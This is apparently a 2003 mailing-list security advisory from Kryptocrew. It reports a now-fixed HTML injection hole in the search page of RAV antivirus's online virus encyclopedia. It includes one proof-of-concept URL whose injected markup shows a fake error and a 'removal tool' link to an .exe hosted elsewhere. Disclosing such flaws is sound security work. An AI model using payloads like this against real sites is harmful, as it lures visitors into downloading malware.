[<prev] [next>] [day] [month] [year] [list]
Message-ID: <199096299.20030904093646@kryptocrew.de>
From: momolly at kryptocrew.de (Redaktion-Kryptocrew)
Subject: [Update]: Code executing in RAV's virus encyclopedia fixed
Vulnerability: Code executing in RAV's virus encyclopedia
Found: 30 Aug 2003
Vendor: RAVantivirus
Vendor notified: 03 Sept 2003
Vendor response: no
Public release: 04 Sept 2003
A further crazy leak:
RAV's virus encyclopedia gives attackers possibilities to inject even
harmful scripts, too.
RAVantivirus overlooked this fault in their virus Information websites.
[Example]:
http://www.ravantivirus.com/virus/by-keyword.php?k=Sobig<br><br><b>if%20you%20recieve%20a%20error%20above%20you%20must</b><br><h3><a%20href=http://www.kryptocrew.de/badfile.exe>download%20this%20removal%20tool!%20NOW!!!</a><br>testing%20your%20saftey...%20%20test
[Update]:
RAV fixed
Thanks to:
Donnie Werner (exploitlabs.com), Roland Brecht (kryptocrew.de) & Alexander Mueller
(ec-security.com)
Regards
G.P
--
======================================================================
G.P.
Online-Redaktion
===============================
Kryptocrew http://www.kryptocrew.de
.: your security advisor team :. mailto:momolly@...ptocrew.de
======================================================================
Powered by blists - more mailing lists